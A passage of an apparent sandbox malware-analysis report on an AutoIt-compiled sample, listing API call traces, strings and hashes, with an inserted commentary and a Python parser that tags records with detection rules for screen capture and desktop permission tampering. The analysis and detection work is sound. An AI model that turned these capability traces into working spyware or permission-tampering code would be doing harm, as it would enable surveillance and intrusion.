                                                            • GetDriveTypeW.KERNEL32 ref: 0020A683
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020A6CB
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020A702
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020A730
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: e79a51bf98aecdd47cd6d82a14c8f95b0160a044738297524d96a5883008b3e7
                                                            • Instruction ID: 45b755504ef0600c59cc46b6694a2a3806e621c8e71fb9410718bc42d5f03854
                                                            • Opcode Fuzzy Hash: e79a51bf98aecdd47cd6d82a14c8f95b0160a044738297524d96a5883008b3e7
                                                            • Instruction Fuzzy Hash: D2515E751143059FC700EF20C98196AB7F8FFA9718F44896DF896572A2DB31EE0ACB52
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0020A47A
                                                            • __swprintf.LIBCMT ref: 0020A49C
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0020A4D9
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0020A4FE
                                                            • _memset.LIBCMT ref: 0020A51D
                                                            • _wcsncpy.LIBCMT ref: 0020A559
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0020A58E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0020A599
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0020A5A2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0020A5AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: a385ae6300afb4a76a940c9c5c1cb10e90d094df9f0f0f6bb3f816a15aae62b2
                                                            • Instruction ID: 5680aeb142ec7808bb93c3579bb7b50a86f9f51c7a489b4b0c639608d89891eb
                                                            • Opcode Fuzzy Hash: a385ae6300afb4a76a940c9c5c1cb10e90d094df9f0f0f6bb3f816a15aae62b2
                                                            • Instruction Fuzzy Hash: 2231B0B691020ABBDB20DFA0DC49FEB37BCEF89701F5041B6F908D21A1E77096558B25
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                            • String ID:
                                                            • API String ID: 884005220-0
                                                            • Opcode ID: fce3d31fa86250435b4fd0783de8f55d8f9c646ddbf46ad9bf6eb9a38307b018
                                                            • Instruction ID: a44f34b70bca422f11607c25a9d8729b580a386884685ca42104b9a9fd471115
                                                            • Opcode Fuzzy Hash: fce3d31fa86250435b4fd0783de8f55d8f9c646ddbf46ad9bf6eb9a38307b018
                                                            • Instruction Fuzzy Hash: 59612472900205AFDB20EF64E842B6977A9EF22332F54415BE8059B3D1DB75D981C792
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0020DC7B
                                                            • _wcscat.LIBCMT ref: 0020DC93
                                                            • _wcscat.LIBCMT ref: 0020DCA5
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0020DCBA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020DCCE
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0020DCE6
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0020DD00
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020DD12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 01f8085c9ffd1c4535be86a3364c083e8fe10433b7f4b02624e5027008976a71
                                                            • Instruction ID: d79b2ab3a15f1f461d0449b807bfaf125373897e1e604a60a097d27367c1a7f6
                                                            • Opcode Fuzzy Hash: 01f8085c9ffd1c4535be86a3364c083e8fe10433b7f4b02624e5027008976a71
                                                            • Instruction Fuzzy Hash: A081D4765253429FCB20DFA4C84596EB7E8BF99304F14882EF885C7292E770DD54CB52
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0022C4EC
                                                            • GetFocus.USER32 ref: 0022C4FC
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0022C507
                                                            • _memset.LIBCMT ref: 0022C632
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0022C65D
                                                            • GetMenuItemCount.USER32(?), ref: 0022C67D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0022C690
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0022C6C4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0022C70C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0022C744
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0022C779
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: c7c2509731bc0751dbe74b14af4c486cb7490a340b03c9c7b69c2bd79151d9b5
                                                            • Instruction ID: 66b9f71be6f6b90af21d3b2c37dcc8c55da2b310ba869fe83e03b9412f34acab
                                                            • Opcode Fuzzy Hash: c7c2509731bc0751dbe74b14af4c486cb7490a340b03c9c7b69c2bd79151d9b5
                                                            • Instruction Fuzzy Hash: 1581AE70118322AFD720CF54E988AAFBBE8FB88314F20452DF99593291D771D925CF92
                                                            APIs
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
                                                              • Part of subcall function 001F874A: GetLastError.KERNEL32(?,001F822A,?,?,?), ref: 001F8770
                                                              • Part of subcall function 001F874A: GetProcessHeap.KERNEL32(00000008,?,?,001F822A,?,?,?), ref: 001F877F
                                                              • Part of subcall function 001F874A: HeapAlloc.KERNEL32(00000000,?,001F822A,?,?,?), ref: 001F8786
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F879D
                                                              • Part of subcall function 001F87E7: GetProcessHeap.KERNEL32(00000008,001F8240,00000000,00000000,?,001F8240,?), ref: 001F87F3
                                                              • Part of subcall function 001F87E7: HeapAlloc.KERNEL32(00000000,?,001F8240,?), ref: 001F87FA
                                                              • Part of subcall function 001F87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001F8240,?), ref: 001F880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F8458
                                                            • _memset.LIBCMT ref: 001F846D
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001F848C
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F849D
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001F84DA
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F84F6
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F8513
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001F8522
                                                            • HeapAlloc.KERNEL32(00000000), ref: 001F8529
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001F854A
                                                            • CopySid.ADVAPI32(00000000), ref: 001F8551
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001F8582
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F85A8
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F85BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 3d3afc55e2a87d53b612eaf90ddc2e3f52c6bdf32c20fcf6e34ae659ad65696a
                                                            • Instruction ID: 9e534b4438c9a566e074c145a0ab468f8f0185840f6cf79c8a5a52c32764e75a
                                                            • Opcode Fuzzy Hash: 3d3afc55e2a87d53b612eaf90ddc2e3f52c6bdf32c20fcf6e34ae659ad65696a
                                                            • Instruction Fuzzy Hash: 3A612B71A00209ABDF10DFA4DD45EFEBBB9FF05310F148269E915A62A1DB319A15CF60
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 002176A2
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002176AE
                                                            • CreateCompatibleDC.GDI32(?), ref: 002176BA
                                                            • SelectObject.GDI32(00000000,?), ref: 002176C7
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0021771B
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00217757
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0021777B
                                                            • SelectObject.GDI32(00000006,?), ref: 00217783
                                                            • DeleteObject.GDI32(?), ref: 0021778C
                                                            • DeleteDC.GDI32(00000006), ref: 00217793
                                                            • ReleaseDC.USER32(00000000,?), ref: 0021779E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 8194ea1bd0b08f8050bb9300f14b560d480ebb292cbf744dd2c20ffa92ebe305
                                                            • Instruction ID: a90619c4c079bbc57cdac25259d7299f686ee54f4bb7af33c353d12a0f9dc1ae
                                                            • Opcode Fuzzy Hash: 8194ea1bd0b08f8050bb9300f14b560d480ebb292cbf744dd2c20ffa92ebe305
                                                            • Instruction Fuzzy Hash: 6D516A75914209EFCB25CFA8DD88EAEBBF9EF48310F14852DF949A7210D731A951CB60
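The two records above are worth reading as capabilities rather than as behaviour. The first is the user-object DACL routine (GetUserObjectSecurity, GetSecurityDescriptorDacl, GetAce/AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity), the documented AddAceToWindowStation/AddAceToDesktop pattern used when a process is launched on another user's desktop. The second is a screen-region capture (GetDC(NULL) for the screen DC, StretchBlt into a compatible bitmap, GetDIBits to read the pixels back). Both sit in the main module of an AutoIt runtime, which the AU3! and >>>AUTOIT SCRIPT<<< strings recovered from this dump identify; whether the compiled script actually exercises them is not something a static function listing shows. Triage of a report like this gets easier when the trace lines are parsed and each function record is tagged with the primitive it implements. The Python below is an added example, not code from the Joe Sandbox report, from AutoIt or from FormBook; its SAMPLE is constructed from trace lines copied from the two records, and the rule names and the API sequences they match are this example's own assumptions.

```python
"""Parse Joe Sandbox-style API trace records and tag each with capability labels.
Added example, not code from the Joe Sandbox report, AutoIt or FormBook. SAMPLE is
constructed from report lines; rule names and matched sequences are assumptions."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One trace line: optional "Part of subcall function <addr>:" prefix, then Api.MODULE,
# optional "(args)", then "ref: <addr>". "_memset.LIBCMT ref: ..." has no parens or comma.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]       # "?" marks an argument the analyzer could not resolve
    ref: int                    # call-site address
    subcall: Optional[int]      # callee address when the line is "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)

    def anchor(self) -> str:
        """Call-site address of the first direct call, formatted as the report prints it."""
        direct = [c for c in self.calls if c.subcall is None]
        return "%08X" % direct[0].ref if direct else "--------"

def parse_trace(text: str) -> List[FunctionRecord]:
    """Split report text into records: an "APIs" header followed by trace lines."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = m.group("args")
            current.calls.append(ApiCall(
                api=m.group("api"), module=m.group("mod"),
                args=tuple(a.strip() for a in args.split(",")) if args else (),
                ref=int(m.group("ref"), 16),
                subcall=int(m.group("sub"), 16) if m.group("sub") else None))
        elif line.strip():
            current = None          # any other non-blank line closes the record
    return records

# Assumed rules: an ordered API sequence that must occur, not necessarily contiguously,
# among the record's calls (subcall lines included).
RULES = {
    # GetDC(NULL) is the screen DC; StretchBlt copies a region into a compatible bitmap
    # and GetDIBits reads the pixels back: a screen-region capture primitive.
    "screen_capture": ("GetDC", "CreateCompatibleBitmap", "SelectObject", "StretchBlt", "GetDIBits"),
    # Read a user object's (window station / desktop) DACL, append an ACE, write it back.
    "user_object_dacl_modification": ("GetUserObjectSecurity", "GetSecurityDescriptorDacl",
                                      "AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"),
}

def is_ordered_subsequence(needle, haystack) -> bool:
    """True when every element of needle occurs in haystack in the same relative order."""
    it = iter(haystack)
    return all(n in it for n in needle)

def classify(record: FunctionRecord) -> set:
    apis = [c.api for c in record.calls]
    return {label for label, seq in RULES.items() if is_ordered_subsequence(seq, apis)}

def summarize(text: str) -> List[Tuple[str, List[str]]]:
    """(anchor address, sorted labels) per record, so a triage note can cite the report."""
    return [(r.anchor(), sorted(classify(r))) for r in parse_trace(text)]

# Constructed sample: the two records above, trimmed to the lines the rules need.
SAMPLE = """\
APIs
  • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F8458
• _memset.LIBCMT ref: 001F846D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F84F6
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F85A8
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F85BC
Memory Dump Source
APIs
• GetDC.USER32(00000000), ref: 002176A2
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002176AE
• CreateCompatibleDC.GDI32(?), ref: 002176BA
• SelectObject.GDI32(00000000,?), ref: 002176C7
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0021771B
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00217757
• ReleaseDC.USER32(00000000,?), ref: 0021779E
"""
```

Matching is on an ordered subsequence rather than on the API set, so a record that calls GetDIBits in an icon or clipboard routine without the preceding GetDC/StretchBlt is not tagged. Further rules can be taken from the other records on this page as their raw trace lines are available; the gethostname/gethostbyname/inet_ntoa record, for instance, appears here only through its API ID string, so its sequence would have to be confirmed from the full report first.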
                                                            APIs
                                                              • Part of subcall function 001C0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,001A6C6C,?,00008000), ref: 001C0BB7
                                                              • Part of subcall function 001A48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A48A1,?,?,001A37C0,?), ref: 001A48CE
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001A6D0D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 001A6E5A
                                                              • Part of subcall function 001A59CD: _wcscpy.LIBCMT ref: 001A5A05
                                                              • Part of subcall function 001C387D: _iswctype.LIBCMT ref: 001C3885
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: b38ccae2da8d9c78e5b856aa4f0a780f8b7bc26d755c940126e3000ce45be8a8
                                                            • Instruction ID: 22714ea78229b84a84cf0eedc2ab481c1ea67324efa3d9a49a349665aeff6c2f
                                                            • Opcode Fuzzy Hash: b38ccae2da8d9c78e5b856aa4f0a780f8b7bc26d755c940126e3000ce45be8a8
                                                            • Instruction Fuzzy Hash: EA02913510C3419FC724EF24C891AAFBBE5BFAA354F04491EF486972A2DB70D949CB52
                                                            APIs
                                                            • _memset.LIBCMT ref: 001A45F9
                                                            • GetMenuItemCount.USER32(00266890), ref: 001DD7CD
                                                            • GetMenuItemCount.USER32(00266890), ref: 001DD87D
                                                            • GetCursorPos.USER32(?), ref: 001DD8C1
                                                            • SetForegroundWindow.USER32(00000000), ref: 001DD8CA
                                                            • TrackPopupMenuEx.USER32(00266890,00000000,?,00000000,00000000,00000000), ref: 001DD8DD
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001DD8E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 2751501086-0
                                                            • Opcode ID: 5cf0ba9fa27fa7963f249f64913076ee56bc87abd5da546518c010100ceeee7e
                                                            • Instruction ID: af352131c1d02197692526f691ec7325e3b23ab83ea6ea0825418b5b7b82f5b8
                                                            • Opcode Fuzzy Hash: 5cf0ba9fa27fa7963f249f64913076ee56bc87abd5da546518c010100ceeee7e
                                                            • Instruction Fuzzy Hash: 8271E775600205BBEB359F64EC49FAABF64FF45768F204227F518662E1C7B16820DB90
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00218BEC
                                                            • CoInitialize.OLE32(00000000), ref: 00218C19
                                                            • CoUninitialize.OLE32 ref: 00218C23
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00218D23
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00218E50
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00232C0C), ref: 00218E84
                                                            • CoGetObject.OLE32(?,00000000,00232C0C,?), ref: 00218EA7
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00218EBA
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00218F3A
                                                            • VariantClear.OLEAUT32(?), ref: 00218F4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,#
                                                            • API String ID: 2395222682-1430289482
                                                            • Opcode ID: 00aa493b3b9270a612b2cd91697a1c43ab7d028037f64f3e90b9e494d38b7860
                                                            • Instruction ID: 681f733a674f0130112a81488c3335dc1afb4237cbbb6e194fc7af7287c67c8b
                                                            • Opcode Fuzzy Hash: 00aa493b3b9270a612b2cd91697a1c43ab7d028037f64f3e90b9e494d38b7860
                                                            • Instruction Fuzzy Hash: 32C14470218305AFD700DF64C88496BB7E9FF99748F00492DF98A9B260DB71ED86CB52
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 9abdd57f8467c13d7c4ec58eb4403c381de7cb1921160a8de1e9f678d1b90b09
                                                            • Instruction ID: b71351a335fc422670469f7f49339c3bfb2c86a5c3dd16f067e82f930d35ad02
                                                            • Opcode Fuzzy Hash: 9abdd57f8467c13d7c4ec58eb4403c381de7cb1921160a8de1e9f678d1b90b09
                                                            • Instruction Fuzzy Hash: 7C412B3016026ADBCF11EED0E891EEA3725AF35350F504558FC965B296DB70AE3ACB60
                                                            APIs
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                              • Part of subcall function 001A7A84: _memmove.LIBCMT ref: 001A7B0D
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002055D2
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002055E8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002055F9
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0020560B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0020561C
                                                            Strings
